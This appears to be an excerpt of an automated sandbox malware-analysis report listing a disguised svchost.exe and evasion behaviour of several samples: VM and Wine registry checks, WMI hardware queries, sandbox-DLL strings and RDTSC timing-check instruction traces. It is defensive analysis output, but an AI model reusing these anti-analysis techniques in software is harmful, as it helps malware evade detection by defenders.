                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                barindex
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                                Source: C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_DiskDrive
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                Source: espartu.exe, 00000022.00000002.4453169253.0000000000F7A000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLLZOOPOIMC:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGSVCS.EXEVMTOOLSD.DLLCMDVRT32.DLLHARRY JOHNSONADMINISTRATOR
                                Source: espartu.exe, 00000021.00000002.4375632738.0000000000BBC000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLLZOOPOIMMWWGYFCHDHJUBQGGFXGLCTTJMDOPTVJVVXYFGYTDOLCHYCBYHQMROOTTSVMTOOLSD.DLLCMDVRT32.DLLHARRY JOHNSONADMINISTRATOR|
                                Source: espartu.exe, 00000027.00000002.4076259326.0000000000A48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL#
                                Source: espartu.exe, 00000020.00000002.3902705795.00000000008FC000.00000004.00000010.00020000.00000000.sdmp, espartu.exe, 00000021.00000002.4375632738.0000000000BBC000.00000004.00000010.00020000.00000000.sdmp, espartu.exe, 00000021.00000002.4376491967.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, espartu.exe, 00000022.00000002.4453169253.0000000000F7A000.00000004.00000010.00020000.00000000.sdmp, espartu.exe, 00000027.00000002.4074861914.00000000008DC000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                                Source: ZharkBOT.exe, 0000001D.00000002.3902836498.00000000003B9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: 0SBIEDLL.DLL
                                Source: Z73fDV6g4L.exe, 00000009.00000002.2110715381.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000025.00000002.4024278753.0000000002E4E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \QEMU-GA.EXE@\]Q
                                Source: Z73fDV6g4L.exe, 00000009.00000002.2110715381.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000025.00000002.4024278753.0000000002E4E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \QEMU-GA.EXE`,]Q
                                Source: Z73fDV6g4L.exe, 00000009.00000002.2110715381.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, see.exe, 0000001C.00000002.3876408152.00000000027FD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000025.00000002.4024278753.0000000002E4E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \QEMU-GA.EXE
                                Source: ZharkBOT.exe, 0000001D.00000002.3902836498.00000000003B9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: ;0SBIEDLL.DLLZOOPOIMMWWGYFCHDHJUBQGGFXGLCTTJMDOPTVJVVXYFGYTDOLCHYCBYHQMROOTTSVMTOOLSD.DLLCMDVRT32.DLLHARRY JOHNSONADMINISTRATOR|
                                Source: espartu.exe, 00000020.00000002.3902705795.00000000008FC000.00000004.00000010.00020000.00000000.sdmp, espartu.exe, 00000027.00000002.4074861914.00000000008DC000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLLZOOPOIMMWWGYFCHDHJUBQGGFXGLCTTJMDOPTVJVVXYFGYTDOLCHYCBYHQMROOTTSVMTOOLSD.DLLCMDVRT32.DLLHARRY JOHNSONADMINISTRATOR
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 11F2F8 second address: 11F319 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8080FFFC67h 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 292D98 second address: 292DAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F8080B8A776h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2981B3 second address: 2981BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pop edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop eax 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 29862A second address: 29864A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8080B8A787h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 29864A second address: 298650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 298650 second address: 298654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 298654 second address: 29865A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 29865A second address: 298660 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 298660 second address: 298664 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 29B745 second address: 29B77C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080B8A782h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F8080B8A786h 0x00000019 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 29B77C second address: 29B798 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d js 00007F8080FFFC56h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jo 00007F8080FFFC56h 0x0000001c rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 29B798 second address: 29B79C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 29B79C second address: 29B836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jno 00007F8080FFFC65h 0x00000011 pop eax 0x00000012 jmp 00007F8080FFFC62h 0x00000017 jp 00007F8080FFFC5Ch 0x0000001d push 00000003h 0x0000001f xor si, 0F87h 0x00000024 push 00000000h 0x00000026 mov di, 50E3h 0x0000002a push 00000003h 0x0000002c jnc 00007F8080FFFC5Eh 0x00000032 push 88FBE958h 0x00000037 pushad 0x00000038 push edx 0x00000039 push edx 0x0000003a pop edx 0x0000003b pop edx 0x0000003c jno 00007F8080FFFC58h 0x00000042 popad 0x00000043 xor dword ptr [esp], 48FBE958h 0x0000004a xor dword ptr [ebp+122D1B49h], esi 0x00000050 lea ebx, dword ptr [ebp+1245059Ch] 0x00000056 jg 00007F8080FFFC61h 0x0000005c jc 00007F8080FFFC5Bh 0x00000062 mov esi, 0E1549DBh 0x00000067 xchg eax, ebx 0x00000068 push eax 0x00000069 push edx 0x0000006a push edi 0x0000006b pushad 0x0000006c popad 0x0000006d pop edi 0x0000006e rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 29B836 second address: 29B83D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 29B882 second address: 29B89F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080FFFC63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 29B89F second address: 29B931 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080B8A781h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F8080B8A778h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 xor ecx, 59A6EEC4h 0x0000002b pushad 0x0000002c mov ebx, 7A619ED5h 0x00000031 jmp 00007F8080B8A77Bh 0x00000036 popad 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push ebx 0x0000003c call 00007F8080B8A778h 0x00000041 pop ebx 0x00000042 mov dword ptr [esp+04h], ebx 0x00000046 add dword ptr [esp+04h], 0000001Ch 0x0000004e inc ebx 0x0000004f push ebx 0x00000050 ret 0x00000051 pop ebx 0x00000052 ret 0x00000053 add dword ptr [ebp+122D212Bh], ebx 0x00000059 call 00007F8080B8A779h 0x0000005e push eax 0x0000005f push edx 0x00000060 push ecx 0x00000061 jne 00007F8080B8A776h 0x00000067 pop ecx 0x00000068 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 29B931 second address: 29B938 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 29B938 second address: 29B961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F8080B8A788h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 29B961 second address: 29B965 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 29B965 second address: 29B9F3 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8080B8A776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b mov eax, dword ptr [eax] 0x0000000d jl 00007F8080B8A77Ah 0x00000013 push eax 0x00000014 pushad 0x00000015 popad 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b jne 00007F8080B8A79Bh 0x00000021 pop eax 0x00000022 mov dword ptr [ebp+122D1DF7h], eax 0x00000028 push 00000003h 0x0000002a mov edi, dword ptr [ebp+122D1884h] 0x00000030 mov dword ptr [ebp+122D200Dh], eax 0x00000036 push 00000000h 0x00000038 sub dword ptr [ebp+122D1D90h], ecx 0x0000003e push 00000003h 0x00000040 mov esi, dword ptr [ebp+122D2A37h] 0x00000046 call 00007F8080B8A779h 0x0000004b pushad 0x0000004c pushad 0x0000004d jmp 00007F8080B8A77Dh 0x00000052 jc 00007F8080B8A776h 0x00000058 popad 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 29B9F3 second address: 29B9F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 29B9F7 second address: 29BA03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 29BA03 second address: 29BA20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8080FFFC5Ah 0x00000009 popad 0x0000000a pop ebx 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jnc 00007F8080FFFC5Eh 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 29BA20 second address: 29BA5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov eax, dword ptr [eax] 0x00000007 jmp 00007F8080B8A782h 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jo 00007F8080B8A799h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F8080B8A787h 0x0000001d rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 29BA5C second address: 29BA83 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8080FFFC56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b add dword ptr [ebp+122D1C41h], edi 0x00000011 lea ebx, dword ptr [ebp+124505A5h] 0x00000017 mov edx, 45F2D593h 0x0000001c mov dword ptr [ebp+122D20DCh], ecx 0x00000022 push eax 0x00000023 pushad 0x00000024 push ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 29BAF0 second address: 29BAFE instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8080B8A776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 29BAFE second address: 29BB02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 29BB02 second address: 29BBD0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8080B8A776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c js 00007F8080B8A789h 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007F8080B8A778h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d call 00007F8080B8A784h 0x00000032 pop esi 0x00000033 push 00000000h 0x00000035 adc cx, 6B18h 0x0000003a mov dword ptr [ebp+122D212Bh], eax 0x00000040 call 00007F8080B8A779h 0x00000045 push edi 0x00000046 jmp 00007F8080B8A781h 0x0000004b pop edi 0x0000004c push eax 0x0000004d jmp 00007F8080B8A77Fh 0x00000052 mov eax, dword ptr [esp+04h] 0x00000056 jmp 00007F8080B8A789h 0x0000005b mov eax, dword ptr [eax] 0x0000005d jmp 00007F8080B8A781h 0x00000062 mov dword ptr [esp+04h], eax 0x00000066 pushad 0x00000067 push eax 0x00000068 push edx 0x00000069 pushad 0x0000006a popad 0x0000006b rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 29BBD0 second address: 29BBD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 29BBD9 second address: 29BC5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pop eax 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F8080B8A778h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 mov edx, dword ptr [ebp+122D2D1Fh] 0x00000029 push 00000003h 0x0000002b movzx ecx, si 0x0000002e push 00000000h 0x00000030 mov dword ptr [ebp+122D2E8Bh], eax 0x00000036 push 00000003h 0x00000038 adc esi, 204F8BF8h 0x0000003e push C94DAB5Ah 0x00000043 jmp 00007F8080B8A789h 0x00000048 xor dword ptr [esp], 094DAB5Ah 0x0000004f mov ecx, edi 0x00000051 lea ebx, dword ptr [ebp+124505B0h] 0x00000057 jl 00007F8080B8A77Ch 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 push ecx 0x00000061 push esi 0x00000062 pop esi 0x00000063 pop ecx 0x00000064 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 28A51E second address: 28A53B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080FFFC63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 28A53B second address: 28A55E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F8080B8A77Eh 0x0000000c push edi 0x0000000d pop edi 0x0000000e js 00007F8080B8A776h 0x00000014 pushad 0x00000015 jns 00007F8080B8A776h 0x0000001b js 00007F8080B8A776h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2B978C second address: 2B9797 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop ecx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2B98EF second address: 2B990F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F8080B8A778h 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e popad 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007F8080B8A776h 0x00000018 jg 00007F8080B8A776h 0x0000001e rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2B9A53 second address: 2B9A59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2B9A59 second address: 2B9A5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
